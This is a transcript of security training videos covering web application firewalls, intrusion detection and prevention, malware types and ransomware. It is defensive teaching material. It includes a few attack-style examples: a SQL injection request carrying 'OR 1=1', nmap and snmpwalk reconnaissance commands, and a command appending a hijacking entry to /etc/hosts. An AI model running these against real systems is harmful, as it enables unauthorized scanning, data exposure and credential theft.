Pictured on the screen, we've got an example of a security appliance being connected to through a web
browser. [A screenshot displaying an example of a security appliance connected to a web browser is
displayed. The image is divided into many sections, some of which are Appliance Information, License
Information, Signature Information, Connection Information, CPU usage for last two hours, and Memory
usage for last two hours.] Now, what we can see in the license information section are the components of the
security appliance. The first one is a web and application filter. The second component is Intrusion Prevention
System, IPS. Then we've got antivirus, antispam, we've got a web application firewall and so on. So security
appliances usually have a nice web-based interface that's easy to navigate, so you can not only configure the
various firewall capabilities. But also monitor them or maybe even configure notification when certain events
occur. Some common examples of security appliances include SonicWALL's Network Security Appliance,
Barracuda Web Security Gateway, Cisco Meraki, and also Check Point Security Appliance. In this video we
talked about security appliances.
After completing this video, you will be able to recognize the unique capabilities of web application firewalls.
Objectives
[Topic title: Web Application Firewall. The presenter is Dan Lachance.] In this video, we'll talk about Web
Application Firewalls. A Web Application Firewall is often referred to as a WAF, spelled W-A-F. It's specific
to HTTP connections, and it's designed to mitigate HTTP specific attacks, including things like cross-site
scripting or XSS.
With cross-site scripting, we've got a malicious user that tries to inject scripts that get executed in the client
web browser into web pages. And sometimes this is possible if the developers of a web page haven't carefully
validated the input into the fields. So an attacker then could put some kind of executable script in there. And
then that page would be viewed by an unsuspecting victim where that client side scripting code would execute
within their web browser and do malicious things. Now, another type of HTTP attack handled by web
application firewalls, among many others, is the SQL injection attack. Now, again, this is usually executed by a
malicious user inputting database instructions within a field that isn't properly validated on a web form.
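As a simple hedged illustration with a purely hypothetical URL, an injection attempt might look like an otherwise ordinary request whose parameter carries database syntax:

curl "http://app.example.test/products?id=1%20OR%201=1"    # the id parameter smuggles in "OR 1=1"

A web application firewall can inspect that query string in the payload and flag or block it, which a packet filtering firewall cannot do.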
And so, the web server then, takes that data in, and executes it against a back end database where it might
reveal information from the database that otherwise wouldn't normally be exposed. Web application firewalls of course
can be customized due to the various different technologies that might be used with web services. And they are
more specialized than packet filtering firewalls because packet filtering firewalls apply up to layer four of the
OSI model. Now, that deals with things like port addresses, whereas layer three deals with things like IP
addresses and essentially looking at different packet header fields. But here, we're talking about looking at a
little bit more detailed information within the packet payload, essentially up to layer seven. So the web
application firewall then can come in the form of an appliance, either hardware or software based. It could also
be a server operating system plugin. In the cloud we might have web application firewall services offered by
the cloud provider or if not we might have a virtual security appliance from a specific vendor that we're
running in the cloud as a virtual machine. Take for example Barracuda, where we take a look at their virtual
appliances listed over here on the right hand side of the screen. [The Barracuda web site is open. The right-
hand side of the page displays a section named Barracuda Virtual Appliances which includes many
subsections, some of which are Barracuda NextGen Firewall F Vx, Barracuda Email Security Gateway Vx, and
Barracuda Web Application Firewall Vx.] And there are many vendors that do this, so if we scroll down the
list of virtual security appliances, eventually we'll come across the Barracuda Web Application Firewall. And
of course, if we click on that link, we'll get some details related to it.
And essentially what we're talking about doing with this is bringing down a virtual appliance that we can then
deploy either on-premises or even in the cloud. Web application firewalls are normally configured and
monitored through an HTTPS connection. The web application firewall can also do many other things like
monitoring traffic entering and leaving a specific web app, and so we can detect abnormal HTTP activity. It
sort of has intrusion detection capabilities built in. So it might look for abnormal activities such as large
volumes of unexpected data input to a web application. So this could indicate that a buffer overflow attack is
being executed. Or it could indicate that we've got a denial of service, or if many machines are involved, even
a distributed denial of service attack that's in progress. Also, abnormal database query strings supplied as input
would indicate perhaps a SQL injection attack. So this can be monitored at the web application firewall level.
However, application developers still need to follow secure coding practices to do things like validate input
correctly on web forms. Common web application firewall products include NAXSI, an open source Nginx module
whose name stands for Nginx Anti XSS and SQL Injection. There is also ModSecurity, which is open source,
products from Imperva, the Citrix NetScaler product, and also appliances from Barracuda. In this video, we
talked about Web Application Firewalls.
After completing this video, you will be able to explain the importance of intrusion detection and prevention.
Objectives
[Topic title: Intrusion Detection and Prevention Overview. The presenter is Dan Lachance.] Today's
networks, more than ever, are potentially susceptible to malicious activity. This could be due to things like the
use of smartphones by everybody to connect to corporate resources and things like ransomware. In this video
we'll talk about intrusion detection and intrusion prevention.
Host Intrusion Detection Systems, or HIDS, are specific to a host, which normally would be running some
kind of specific application that we're trying to protect from malicious activity. But we can also use Network
Intrusion Detection Systems, or NIDS. Network Intrusion Detection Systems aren't specific to a host, but
instead are placed carefully on the network to look for anomalous network activity. So the detection part
comes through monitoring, where one way to do this is to compare data, current activity data, to a known threat
database. Or compare it to a baseline of normal activity that was taken within a specific environment. Intrusion
detection also can log suspicious activity. Now in that case, we want to make sure that wherever that
information is logged to is kept secure.
So for instance, we might enable log forwarding from a device where we've got intrusion detection being
monitored so that it gets stored elsewhere. We can also correlate current data with related or even older data
historically, to determine that some kind of suspicious activity is taking place. Intrusion detection can also send
notifications to administrators about suspicious activity. Intrusion prevention comes in a couple of forms,
including Host Intrusion Prevention Systems, or HIPS. Of course, much like with intrusion detection, there's
also Network Intrusion Prevention Systems, or NIPS, that work at the network level. Now not only is detection
possible with intrusion prevention, but there can also be an attempt made by the solution to prevent further
damage.
Now intrusion detection and prevention solutions could come in the form of physical hardware, or a virtual
appliance, or software installed within a server OS. Now with intrusion prevention we monitor for suspicious
activity, we can compare that to known threat database problems or against a baseline of normal activity, just
like with intrusion detection. But intrusion prevention allows us to extend that a bit further. So besides the
normal logging of suspicious activity or correlating with current related or older data, and sending notifications
about this activity. Intrusion prevention systems can be configured to attempt to stop the activity once it's
detected. Now this could come in many forms depending on what it is it detects. For instance, we might have
our intrusion prevention system configured to block connections from offending IP subnet ranges or addresses
if we've got suspicious activity from those sources. Or maybe to block a port for an attack that's in progress.
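As a rough sketch of what such an automated response could amount to on a Linux host (the subnet and port below are purely illustrative, using a documentation address range):

iptables -I INPUT -s 203.0.113.0/24 -j DROP      # block an offending source subnet
iptables -I INPUT -p tcp --dport 8080 -j DROP    # or temporarily block a targeted port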
Now you might want to be careful with this when you configure the parameters for that kind of setting.
Because if we're talking about a web server, and it looks like it's being attacked with a distributed denial of
service attack, do you really want to block that web server port? Because you're also preventing legitimate
connectivity. But the argument against that of course is that well, legitimate activity won't occur anyway if it's
being overloaded with useless traffic. We should also consider whether we want to quarantine things like
suspected malware or suspected processes. This is also considered suspicious activity. This needs to be
configured for the specific environment that you want to use this in. And the reason is because you might end
up with too many false positives, things that could potentially appear to be suspicious and therefore you might
be closing ports or stopping processes when in fact they're benign. So it is specific to each and every
environment. In this video we did an intrusion detection and prevention overview.
After completing this video, you will be able to recognize when to use a HIDS.
Objectives
[Topic title: Host Intrusion Detection Systems. The presenter is Dan Lachance.] In this video, we'll talk about Host Intrusion Detection Systems, or HIDS. A HIDS can be configured to compare current activity data against a known threat database. Now, the data would be current activity data that is being captured by our Host Intrusion Detection System. It
can also compare current activity data to a baseline of normal activity. But that's only going to work properly if
a baseline of normal activity for a given host has already been taken. You might have to capture activity, for
example, perhaps for a few days or for an entire work week on a system to determine what's normal in the first
place. Because from that our Host Intrusion Detection System can then have some kind of relative comparison
point or reference point where it can determine what is suspicious or abnormal.
A Host Intrusion Detection System might come in hardware form; it might be rack-mountable equipment.
Or it might be software you install within a server operating system. It might be a dedicated virtual machine
appliance that you run on-premises or in the cloud. There are many various solutions available. Host Intrusion
Detection Systems are designed to monitor details or activity related to a specific application. However, it's
common that you need to train your Host Intrusion Detection solution for your specific environment. Some
HIDS solutions have a learning mode where you can have them establish a baseline of normal usage activity.
However, you might also have to manually configure specific rules or tweak them yourself to eliminate false
positives. A false positive is essentially a triggered alert for something that the system thinks is suspicious
when in fact it's actually normal and benign. So, what we see on the screen then is an example of a Snort rule.
The Snort IDS or Intrusion Detection System, is a common open source IDS solution. So, in this example, we
are configuring an alert. [The following code is displayed: alert icmp any any -> any any (msg:"ICMP Traffic
Detected";sid:3000003;). Code ends.] What it's going to do is generate an alert if there is any ICMP traffic
from any host to any host, and we're assigning it a Snort ID rule, here seen as 3000003. And we can determine
if we configure Snort further, whether we are generating email notifications, writing to a log or doing both
and so on. So that's a sample Snort IDS rule.
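As a quick hedged aside, once a rule like that is saved in a rules file referenced by the Snort configuration, Snort might be started against an interface something like this (paths and interface names will vary by installation):

snort -c /etc/snort/snort.conf -i eth0 -A console    # run Snort with the given config, alerting to the console

How you configure the rules will vary depending on your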
solution. Some are more graphically based whereas Snort here we can see allows us to configure our rules at
the command level, although it does give us increased flexibility this way. A Host Intrusion Detection
System runs on the host itself as opposed to on the network. What this means is that, for applications that
deal with network-encrypted data, the encrypted data gets decrypted by the host. This means, then, that
the decrypted version of that data is then available for IDS examination. Whereas, with a Network Intrusion
Detection System in most cases any encrypted network data isn't examined by the Network Intrusion Detection
System. There are some exceptions because there are some Network Intrusion Detection Systems that do have
the ability for you to specify an encryption key. Or to import, for example, a PKI certificate that contains a
decryption key. In this video we talked about Host Intrusion Detection Systems.
[Topic title: Network Intrusion Detection Systems. The presenter is Dan Lachance.] In this video we'll talk
about network intrusion detection systems. Network intrusion detection systems are often referred to as NIDS.
They're designed to look for inappropriate or unauthorized use specifically on a network as opposed to a specific
host on the network.
So it can be configured to compare data that's current activity data to known threats on the network. Or it can
be configured instead of or in addition to, to compare current activity data on the network to a baseline of
normal activity. But much as is the case with a host intrusion detection system, a network intrusion detection
system has to have an existing baseline of normal activity.
And what's normal on a network within one company will be different from what is normal on a network for a
different company. So it is specific to an organization. We need to consider the placement of the NIDS on the
network. So for instance, if we want our network intrusion solution to be able to monitor all network traffic,
we must make sure it's placed appropriately so that it can see all network traffic. So if we were specifically
doing this for Internet traffic, inbound and outbound, we'll probably want to make sure that our NIDS is in the
middle of the connectivity between our internal network and the Internet. In the case of network switches, we
might have to plug our network intrusion detection system into a specific switch port. And the switch
administrator might have to configure port mirroring, or copying of data from all ports to the one that the NIDS
is plugged into. Just like with host intrusion detection systems, a NIDS could be a hardware appliance.
Or it could be software installed in a server operating system, or it might be a specialized operating system, an
appliance essentially, whether that's a virtual appliance that you run in the cloud or one that you run on
premises. The network intrusion detection system needs to be trained for your specific environment, again,
similar to a host intrusion detection system. Many NIDS solutions will have a learning mode, where essentially
you can configure it to monitor activity for a period of time to establish a baseline of normalcy in your
environment. You can also instead of or in addition to, normally it's in addition to, configure specific rules for
what is considered suspicious network activity and what to do about it. And also you can tweak it to eliminate
false positives. On the encrypted network data level, generally speaking network intrusion detection systems
can't examine encrypted data. Now of course, as always there are exceptions to every rule.
There are some NIDS systems that will allow you to specify decryption keys in various forms so that they can
examine encrypted data. But generally speaking, this is not the case. So we might have one solution that does
allow us to enter perhaps a symmetric key or phrase, or even to import a PKI certificate for decryption. A
NIDS looks for various hints of abnormal network activity. And that's going to include things like
reconnaissance. Reconnaissance is one of the first phases an attacker would undertake before they start to try
to exploit vulnerabilities.
Basically, it's learning for the malicious user about what's out there. This can be done through ping sweeps to
determine which hosts are actually up and running on the network. Or conducting port scans to identify which
network services are running on hosts on the network. Also it includes SNMP scanning. SNMP stands for
Simple Network Management Protocol. This has been around for decades. And it's a way for us to use a
management station to query information about a network device, whether it's a server, a router, a switch and
so on. So we can get statistics through SNMP by querying an SNMP MIB, Management Information Base. Or
in some cases SNMP can also be used to write configuration changes over the network to network devices.
SNMP normally occurs over UDP port 161. So that might be something we want to consider when configuring
packet filtering rules.
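As a hedged illustration of what that reconnaissance might look like from the attacker's side, and of restricting SNMP at a packet filter, the addresses and community string below are purely examples:

nmap -sn 192.168.1.0/24                              # ping sweep to find live hosts
nmap 192.168.1.91                                    # port scan a discovered host for listening services
snmpwalk -v2c -c public 192.168.1.1 1.3.6.1.2.1.1    # query the SNMP system group on a device
iptables -A INPUT -p udp --dport 161 -s 192.168.1.50 -j ACCEPT   # allow SNMP only from the management station
iptables -A INPUT -p udp --dport 161 -j DROP                     # drop SNMP from everywhere else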
Network exploits, essentially, can be determined because a malicious user will normally try to test discovered
targets for weaknesses. And that might not be normal activity against a service. So for instance, running a
Telnet session to poke and prod at an HTTP server, instead of actually issuing a standard HTTP GET request
to retrieve information from the web page, could be an indicator of suspicious activity. We might also have a
NIDS that looks for hints of denial of service attacks. A denial of service attack, or DoS, D-O-S, essentially is
excessive traffic or activity on a specific host beyond normal usage. Now that might be executed by locally
installed malware or it might be executed even over the network. Common network intrusion detection
products include the Snort open source tool, AlienVault Unified Security Management, or USM, and Symantec
NetProwler, among many other solutions. In this video we talked about network intrusion detection systems.
Upon completion of this video, you will be able to recognize when to use a NIPS.
Objectives
[Topic title: Network Intrusion Prevention Systems. The presenter is Dan Lachance.] In this video, we'll go
over network intrusion prevention systems. Network intrusion prevention systems are often called NIPS, N-I-
P-S, for short. They're designed to look for inappropriate or unauthorized use at the network level. So network
activity then is monitored and compared against known threats or compared against a baseline of normal
activity taken for that network.
Similar to network intrusion detection systems, we should consider the placement of the network intrusion
prevention solution on the network. Because if we needed to see all network traffic then it must be placed
accordingly on the network. Maybe within a demilitarized zone if that's what we're looking for in terms of
network intrusions. Or maybe it needs to be on an internal switch port that can see all traffic within the switch.
Intrusion prevention allows us not only to identify potential suspicious activity as network detection does.
But it has the added benefit of being able to do something about it, like responding to threats immediately.
Now it can prevent the exploit of vulnerabilities once suspicious activity is detected and we have to think about
the placement again of this solution. Because it needs to be between the potential threat and the asset that's
being protected. So, for example, our network intrusion prevention solution might be placed after the Internet
firewall, but before our web application server. If that's what we're looking for in terms of network intrusions.
Some prevention actions that are available include the ability to log suspicious activity and notify
administrators of it. Now, that could be considered prevention, of course, not real time, in that administrators
could take action. However, that makes it no different from a network intrusion detection system. Now,
what makes it a network intrusion prevention system is the ability to do things like dropping suspicious
packets, blocking connections based on IP subnet ranges or individual addresses. Resetting specific sessions
that seem suspicious, or quarantining malware or suspicious processes. There are many products that allow us
to implement network intrusion prevention. And some of them will support, of course, both network intrusion
detection and prevention within the same solution, whether it's a hardware appliance or a software solution.
Common products include the open source Snort tool, Trustwave's Intrusion Detection and Prevention
solution, and Symantec NetProwler. In this video, we talked about network intrusion prevention systems.
Find out how to prevent threats from materializing and follow proper forensic procedures.
Objectives
Exercise Overview
[Topic title: Exercise: Prevent and Investigate Security Problems. The presenter is Dan Lachance. ] In this
exercise, you'll begin by differentiating packet filtering firewalls from proxy servers. Then, you'll differentiate
host intrusion detection systems from host intrusion prevention systems. You'll then explain ransomware.
You'll then view deleted files on a hard disk. And finally, you'll configure the Windows firewall to allow
inbound SSH traffic from the 172.16.0.0/16 network. At this point, pause the video, go through each of these
exercise steps and then come back here to view the results.
Solution
Packet filtering firewalls allow or deny network traffic. Criteria can be based on the packet headers but not the
content or the payload in the packet itself. So we can build our criteria based on source and destination IP
addresses, source and destination ports, protocol type and so on. Proxy servers, on the other hand, can protect
the identity of internal clients. This is because outgoing traffic is really done by the proxy server on behalf of
the internal client. And proxy servers also have the ability to examine application level data. So they can look
all the way down into the payload, or data within the packet, beyond just its headers, which is all that packet filtering
firewalls can do. A Host Intrusion Detection System, or HIDS, runs on a specific host and can examine host
processes and logs. It can examine application-specific nuances, and then it can detect related anomalies.
The anomalies can be logged, and/or notifications sent. With an Intrusion Prevention System, in this case a
Host Intrusion Prevention System, the added capability is of stopping suspicious activity beyond just logging
and notifying of it. Ransomware is a form of malware where use of the computer system could be blocked while
waiting for a payment. Then, if the payment is made, some kind of a code is given to the
victim and they can continue using their system. Another form of ransomware will encrypt files. And in the
same way, the ransom must be paid, in this case, before the files are decrypted. There are hundreds of tools
that can be used to view deleted files, in this case, on the Windows platform. Here I'm going to use the
Restoration tool, [Dan accesses the Restoration tool and the Restoration Version window opens.] where I can
tell it which disk I want to view. And then I can simply put in wildcards if I only want to see certain types of
files. Or I can just click Search Deleted Files if I want to see them all. While the Windows firewall can be
configured here in the GUI, it can also be configured at the command line. For instance, using PowerShell
cmdlets. Here we'll use the GUI. So we're going to build an inbound rule as the exercise stated. So I'll right-
click and build a New Rule. [He right-clicks the Inbound Rules subnode and selects New Rule from the shortcut
menu and the New Inbound Rule Wizard opens.] It's going to be based on a Port, because it was for SSH. So
the port number is going to be TCP port 22. And I want to Allow the connection. And I'll apply to all of the
network profiles, and I'll specify a Name. I'll call this SSH In. Now after the rule is created for SSH In, I'm
going to double-click and open it up and [The SSH In Properties dialog box opens which displays many tabs
such as Protocols and Ports, Scope, and Advanced.] click the Scope tab, where I can specify IP address ranges
where we can allow connections from. For example, 172.16.0.0/16, [He enters the IP address in the IP
Address window.] as was required in the exercise.
Table of Contents
[Topic title: Malware Overview. The presenter is Dan Lachance.] In this video we'll do a malware overview.
Malware is malicious software. This type of software gets installed and runs on a machine without user
consent or through trickery. Malicious user motivations for creating, deploying, and using malware come from
financial purposes and bragging rights. There could be political or ideological reasons why they are executing
these types of infections, or simply for reconnaissance to learn more about a potential target that they want to
compromise. Malware types come in many forms. We could have viruses which attach themselves to files,
worms, which are self-propagating over the network using standard file sharing methods, or Trojans, which
essentially look not suspicious, but rather they look legitimate, they look benign. But they in fact contain a
malware payload. Or we could have spyware that monitors our activity, for example, our web surfing habits or
our banking habits. But how does a malware infection actually occur? Well, this list is just the tiniest of
samplings. There are many ways this can occur. One way is by people downloading BitTorrents. Whether
they're downloading the latest movie that's in the theaters that perhaps they really shouldn't be doing due to
copyright laws, or they're downloading things that they otherwise would need to pay for legitimately. Often
with a BitTorrent download indeed it does contain what the user was looking for, for example, the latest
theatrical release of a movie. But at the same time, when that movie is run it could be executing malware in the
background, unbeknownst to the user. Even viewing a web site in some cases can infect a machine without
even clicking anything on the site. This is often called a drive-by infection.
Now, it does depend, of course, on the web site and its nature of malicious content. But it also depends on the
user's web browser and how it's configured. Now certainly, if the user gets a message about their computer
being infected and then they click on a link to run a scan, which in itself is really infecting the machine, that's
the user actively clicking on something. But there are times when the user doesn't have to click on anything
and their machine can still be infected. So installing software that seems benign, such as, for instance, a virus
scanner, or any type of free software especially. Clicking a web site link that a user might receive in an email,
and often these are targeted to users. And the text in the message is often convincing to trick the user into
thinking this is specifically for them. Maybe to reset a banking account password or so on. Opening file
attachments should also be approached with suspicion. Unless we are expecting a specific file attachment, we
should be very careful as to whether or not we're going to open it. Symptoms of a malware infection include
things like performance degradation on the machine, so the machine slows down. We might also get email
notifications regarding abnormal account usage.
And it might actually be legitimate. We might get an email notification from our bank, or PayPal or our email
account, whether it's Google or Outlook.com. But we have to be careful. Because how do we know that this
email notification itself isn't some form of social engineering or trickery? Any unexpected changes to settings on
the machine could potentially indicate an infection. It could also have been pushed centrally by an
administrator's configuration change. However, things like web browser start pages being changed and not
being able to be changed back, or processes running in the background that we're not familiar with, potentially
could indicate an infection. But you want to be careful because sometimes they could be legit. Any unexpected
newly installed web browser plugins could also be an indication of an infection, as are disabled software
update mechanisms. A malware toolkit facilitates the creation of malware for a malicious person. And there
are many of them out there, believe it or not. So, for instance, the Blackhole exploit kit contains tools and
tutorials and documentation on how to create and propagate malware. There are also underground chat rooms
on the Internet that are available. And of course, membership is by invitation only, where there is actually
malware for sale to the highest bidder. So how do we mitigate malware? Number one, user awareness and
training. Everybody in the organization needs to be in the know about understanding how easy it is to infect a
machine even through trickery or social engineering.
We should also make sure we've got up to date antimalware scanning on all devices, including smartphones.
The same thing is true for personal firewalls. It needs to be on every device, looking at traffic coming into the
device and leaving the device even at the smartphone level. We should always, within the corporation, limit
use of removable media because that's one way that infections can be brought into an environment. Of course,
your antimalware scanner might pick it up before it causes damage. We should also limit Internet file
downloads and be very suspicious when opening links in email messages, as well as opening file attachments
from email messages. Common malware products or rather antimalware products include those from
Kaspersky, McAfee, Sophos, AVG and Windows Defender. Now just because we might be using a free
antimalware solution like Windows Defender, doesn't necessarily mean it's not as good as some of the paid
solutions. Now of course with a malware solution at the enterprise level, we want some kind of centralized
way to deploy and control the configuration of our antimalware and also have some kind of central notification
and reporting mechanism available. Now in that case, you might have to pay for a solution that does that. But
just because you're paying for an antimalware solution doesn't necessarily mean it's better than the free ones. In
this video we discussed malware.
identify viruses
[Topic title: Viruses. The presenter is Dan Lachance.] In this video, we'll discuss viruses. A virus is a form of
malware that installs and runs without user consent or through trickery, or maybe a combination of both. By
tricking the user to install software that looks legitimate but unleashes a virus in the background. Viruses
normally replicate themselves by attaching to data files, scripts, executable program files, or even disk sectors
in some cases. The way that viruses get transmitted is often through e-mail file attachments that people open,
or in some cases, through files that people download from the Internet. The timing of the virus is such that it
might be executed immediately upon infection, or in some cases, it might wait for a specific date of some
significance or some kind of condition to be met on the machine. So this type of virus that waits for a date or
condition to be met is called a logic bomb. In the 1990s, this is exactly what the Michelangelo virus was about.
It waited until March 6th, in the early 90s, before it would execute. Back in the early 90s, Michelangelo was
transmitted through infected floppy discs. Which these days, can be done through infected USB drives, with
other forms of malware, or infected file downloads from the Internet. The idea with the Michelangelo virus
was that it was a boot sector infecting virus. So when the OS booted, it was resident in memory.
And, on Michelangelo's birthday, it was supposed to wipe out the hard disk by overwriting it with
random characters. But in the end, on March 6th of 1992, very few computers were actually affected by the
Michelangelo virus compared to the ominous predictions. A macro virus is embedded in the macro language
code for a specific application. For example, a Microsoft Word macro virus could trigger when a user opens an
infected document that would trigger ransomware to encrypt their files. Of course, the user would then have to
pay a ransom to potentially receive a decryption key. So one thing that we could do is disallow the autorunning
of macros, such as when files are opened. We could only allow the use of trusted and digitally signed macros.
Or, if we don't use macros at all, we're probably better off completely disabling it to reduce our attack surface.
Consider the example of macro security here in Microsoft Excel. [A Microsoft Excel file named Book1 is
open.] I'm going to go to the File menu, where I'm going to go all the way down to Options. [The Excel
Options dialog box opens which displays many tabs. Some of the tabs are General, Formulas, Proofing, Save,
language, Advanced, Customize Ribbon, Quick Access Toolbar, Add-ins, and Trust Center. The box also
includes buttons named Ok and Cancel.] On the left, I'll then click on Trust Center. And then on the right, I'll
click the Trust Center Settings button. [The Trust Center dialog box opens. The box is divided into two
sections. The first section displays many tabs such as Macro Settings, Protected View, Trusted Locations, and
Message Bar. The Macro Settings tab is selected by default and the second section displays information
related to the selection made in the first section. Information on Macro settings and Developer Macro Settings
is displayed. In the macro settings section, The Disable all macros with notification is selected by default. The
box includes two buttons named Ok and Cancel.] Here on the left, you can see that Macro Settings are
selected. So on the right, it's currently set to disable all macros with a notification.
But there are other options, such as disabling all macros without a notification, disabling all macros except
those that are digitally signed and, of course, trusted. Or, we could enable all macros, which is definitely not
recommended. And again, if your users don't even use macros, you might completely disable it in this specific
application. Now, here in Microsoft Excel, over on the left, we've also got Trusted Locations. [Dan clicks the
Trusted Locations tab and the second section displays the Trusted Locations.] In other words, locations on the
network from which we are allowed to open files. So files in other folders might not be trusted and might
prompt us with a warning message. There are countless virus examples, including the Stuxnet worm, uncovered in 2010. It damaged uranium enrichment equipment in Iran and propagated as a worm, meaning it was self-propagating over a network. Around the same period, the Conficker worm, first detected in 2008, acted as a botnet infector. A botnet, of course, is a group of computers under a single malicious user's control. And of course, now in 2016, we keep hearing
about occurrences of ransomware. So in various ways, this malware is triggered, such as opening an infected
document or clicking a link. And what happens is, it could infect files by encrypting them and requiring a
ransom payment before potentially providing a decryption key. In this video, we talked about viruses.
identify worms
[Topic title: Worms. The presenter is Dan Lachance.] In this video we'll discuss worms. Worms are a form of
malware that is often delivered through a Trojan mechanism. A Trojan means the user receives something that appears to be benign, such as usable software that they might download and install, when in fact it is simply used as a tricking mechanism to deliver the malware to the user's PC or smartphone. Worms are self-propagating over a network, so they don't require an existing host file to attach themselves to. Worms spread when one machine gets infected, either through some kind of vulnerability exploit or through social engineering, which is tricking the user into downloading something, clicking a link, or opening a file attachment. With a worm, network transfer is used to copy itself to other systems. So again, it's self-
propagating. This can be done through file and print sharing over the network, FTP, file transfer protocol, SSH
or secure shell, which is used to remotely administer network devices like servers, routers and switches over
the network. It can be transferred through email and instant messaging.
So basically, worms can spread themselves through many common communication techniques. Once they actually run, worm infections do more than spread themselves: they might spy on computing habits. They
might steal sensitive information, such as sensitive files stored on your computer or that are accessible
elsewhere through your computer, such as on a database server or in the cloud. Or a worm might monitor
keystrokes. It might be a key logger and send those back to malicious users. Also a worm could redirect users
to fraudulent sites. So for instance, a worm could modify the local system's HOSTS file which is checked
before DNS servers to resolve names to IP addresses. So with this example, a malicious user might spy on your
habits and take note of your preferred bank for online banking. And then might make a HOSTS file entry that
redirects the same URL to a website under their control that looks just like the real banking site. But it's really
just designed to steal your banking credentials before displaying a message about the bank experiencing
technical difficulties. Worms, of course, can also consume enormous amounts of network bandwidth, which
could be an indication that this infection is underway. In this video we discussed worms.
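As a footnote to the HOSTS file trick described above, here's a minimal sketch of what such a redirect might look like on a Linux host; the domain and IP address are made up purely for illustration:

# Append an entry that hijacks a bank's host name (illustrative values only)
echo "203.0.113.10 www.examplebank.com" >> /etc/hosts
# Verify which address the name now resolves to locally
getent hosts www.examplebank.com

On Windows, the equivalent file lives at C:\Windows\System32\drivers\etc\hosts, which is why malware so often targets it.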
[Topic title: Spyware, Adware. The presenter is Dan Lachance.] In this video, I'll discuss spyware. Spyware is
a form of malware, and like most malware, it installs and runs without the user knowing about it. Spyware,
specifically, is designed to secretly or covertly gather information about things like our computing habits, the
software that we use, files that we access and the contents within them, perhaps. As well as gathering
keystrokes that we might enter as we type on the keyboard. Including when we authenticate to various
resources, like internal servers, so it would reveal our credentials if we're using username and password to
authenticate, and also things like online banking and so on. So therefore, spyware gathers data that could be
very valuable for marketing purposes. So the motivation is clear, it could be for financial gain or it could be to
gather credentials to further compromise other systems or networks. Adware is another form of malware. And
like all malware, it installs and runs normally without user consent. However, that's not necessarily always the
case. Adware is designed to display appropriate advertisements. Now, what does appropriate mean in this
context? It means based on your computing habits, it somehow monitored what you've been doing, what
you've been searching for, and looking at on the Internet and displays related advertisements.
So it might look at things like sites that were visited, searches that were conducted, and just generally how the
computer is used. We want to be careful when we install free software, because this is an example of how spyware or adware might be installed, not exactly with our consent, but because we had the option to uncheck something and didn't. So when you install free software, sometimes you have to be aware of
additional software installed with it. And if all you're doing is, in a rush, installing free software and clicking
Next, Next, Next through the installation wizard, you might not read a message that tells you it's going to
install something, like another browser plugin. Where, if you were a little less hasty, you could have
unchecked that additional software installation. Because it itself might be spyware or adware. So, basically, be
careful, take your time, it's all about being suspicious, to be honest, about these things. And read all
agreements before you install things like free software. Now of course, as is the case with all malware, we
want to make sure we're running up-to-date antimalware software on every network device. Now, this might
even include installing a browser plugin to block ads. But again, be careful. Because sometimes malware
shows up itself as being antimalware. So be very careful. In this video, we talked about spyware and adware.
[Topic title: Ransomware. The presenter is Dan Lachance.] In the real world, a ransom payment is required
when something of great value to somebody is being held by an unauthorized party. In this video, we'll talk
about ransomware. Ransomware is a rampant form of malware that is spreading all over the world in 2016,
although that's not when it began. But it seems to be more prevalent than ever now. In its most common form, ransomware will encrypt files the victim has write access to. That includes files stored locally on a device and even over the network, including in the cloud. So what happens is, when the ransomware infection initiates, it will contact a command-and-control center on the Internet, awaiting instructions from the malicious user. A ransom payment is demanded, and in turn, the attacker will provide a decryption key, or so they claim.
Other variants of ransomware would prevent computer access, maybe upon boot up. It requires some kind of a
special code, and unless payment is received, then the code is not provided. So therefore, the system is not
usable. Now, ransomware scare tactics include legitimate looking logos or sites that look like the real thing,
but in fact, are not.
Now, often, these scare tactics would include messages that appear to be coming from law enforcement. For
example, if you're on the Internet conducting searches, you might get a pop-up message that even includes the
local law enforcement logo that looks legitimate and demands payment. Otherwise, you could face
imprisonment based on what you've been looking at on the Internet. The same kind of thing also happens
through tax agencies. Everybody has to pay taxes, but many people don't like it, and they're very much afraid
of the taxing authorities. So if we get a message, whether it's a pop-up in our browser or an e-mail message
saying that either we have a tax refund, or in terms of a scare tactic, telling us that we owe tax money in
arrears, most people will be fooled into thinking that they must do this. And, in fact, when they submit a
payment, it's actually going to the malicious users. Consider the example on-screen, which is a real e-mail
message that I received a while ago. [A screenshot of a fraudulent mail is displayed in which the sender's e-
mail address is fake. The mail includes a link titled Your request can be made here.] This message claims to
be from the Canada Revenue Agency, but up at the top, if we take a look at the e-mail address, that does not
look legitimate. And, essentially, I can make a request simply by clicking the provided link, to claim my
refund of $318.12 in Canadian funds. Now, of course, this is not a legitimate e-mail message, it's a phishing e-
mail.
And when I actually click the link, it might simply gather some personal information about me. Or, it could
infect my computer and perhaps even encrypt files using ransomware. Consider this second example where we
have a message in a browser that appears to come from the Royal Canadian Mounted Police that says that all
of the files on our machine are encrypted. [A screenshot of a web site purporting to be the web site of the
Royal Canadian Mounted Police is displayed.] And this is due to a violation on our part of some kind of law,
whether it's copyright infringement, viewing or distributing prohibited pornographic contents, or some kind of
illegal access from our PC. Now, of course, unsuspecting victims get afraid and will pay a ransom, and also
pay a fine of some kind so that they get their machine back and also avoid imprisonment. It's just another scare
tactic invoked by scammers. So any time you get these messages or e-mail, it could be e-mail or a web pop-up
or something like that from some kind of authority, like another government agency of some kind, always
question it twice. And if you need to, make a phone call.
Don't just click on links randomly because you feel threatened in some way based on the message that you're
seeing. With a ransomware infection, this can often be propagated by downloading Internet files, or by
installing software that appears legitimate, but might also be infected as well. We might infect our machine
with ransomware by visiting a webpage, by clicking a link, either on a webpage or through e-mail, even by
opening an e-mail file attachment that has some kind of an autorun virus. Ransomware payment is usually
requested in Bitcoin, where Bitcoin is unregulated. That doesn't necessarily mean it can't be traced, but it's not
regulated by any single governing authority. However, even if you make a ransomware payment, there is no
guarantee that you will get a decryption key or a code to unlock your computer.
However, in some cases, ransom payment may actually be cheaper than spending the time to recover systems
and data through imaging and through backups. That's not to say that we should pay ransom, but it's just a
general consideration. Encryption mechanisms for ransomware might be through a Microsoft Word macro
virus that executes PowerShell commands. So we should always run up-to-date antimalware software. And, of
course, user awareness. Users need to be aware of how these infections actually occur, because it only takes a
single user to click on one link, or open one file attachment, to bring down the entire network. So users must
understand that they should never open unexpected file attachments or click links sent via e-mail. If they don't
know what to do, they should open a help desk ticket, and then we can escalate it further. The other thing is to
make sure that we have frequent and working backups. Because if by chance we do get hit with some form of
ransomware, we need an alternative way to get our data back. And hopefully, our data is recent and it works.
